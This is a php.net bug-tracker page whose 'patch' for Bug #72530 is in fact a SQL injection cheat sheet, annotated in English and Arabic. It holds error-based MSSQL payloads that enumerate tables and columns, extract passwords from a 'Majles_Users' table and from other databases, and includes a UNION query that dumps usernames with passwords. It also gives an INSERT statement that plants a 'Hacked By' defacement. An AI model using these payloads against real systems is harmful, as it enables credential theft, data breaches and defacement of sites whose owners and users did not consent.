php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Return to Bug #72530
Patch alfa revision 2019-11-09 17:22 UTC by asdaaa at gmail dot com

Patch alfa for *General Issues Bug #72530

Patch version 2019-11-09 17:22 UTC

Return to Bug #72530 | Download this patch
Patch Revisions:

Developer: asdaaa@gmail.com

Get tables   : 

' and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Get tables 2 :

' and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not  in ('err_dios')))--

Get Column for Tables : 

' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Majles_Users'))--

Get All column fro tables : 

'and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Majles_Users' and column_name not in ('UserID','MemberUserName','MemberPassword','MemberName','Email','CreateDate','RoleID','UserImage','Jop','Faculty','Dept','Rank','Online','Mobile','LastLoginDate','LoginCount')))--

Get data column fro tables:

' and 1=convert(int,(select top 1  MemberPassword  from Majles_Users))--

لجلب بيانات غير الاولى من الجدول

' and 1=convert(int,(select top 1 uname from users where uname not in ('admin')))--

هذا الاستعلام ينفع للمواقع اللي مانعه  = 
' or 1 in (select top 1 table_name from information_ScheMa.tables)--

ادخال البيانات للحقول 

INSERT INTO ALmrShdi511 < TABLE  (mrshd511) < Column values ('Hacked By ALmrShdi 511 < Snap : SQL.i');


يمكن جلب  عواميد معينه عن طريق union

-1 union select 1,concat(username,0x3a,password),3 from users --

جلب جداول من قاعده ثانيه

' and 1 = (SELECT TOP 1 table_name FROM workerdb.information_schema.tables)--
جلب جداول غير الاولى 

' and 1 = (SELECT TOP 1 table_name FROM workerdb.information_schema.tables WHERE TABLE_NAME not in('users'))--

جلب عواميد من قاعده ثانيه 

' and 1 = (SELECT TOP 1 column_name FROM workerdb.information_schema.COLUMNS WHERE TABLE_NAME='users' and column_name not in('uid'))--

استخراج البيانات من العواميد للقاعده الثانيه

' and 1 = ( select top 1 password FROM other_database..other_table)--
 
PHP Copyright © 2001-2020 The PHP Group
All rights reserved.
Last updated: Sat Jan 18 11:01:24 2020 UTC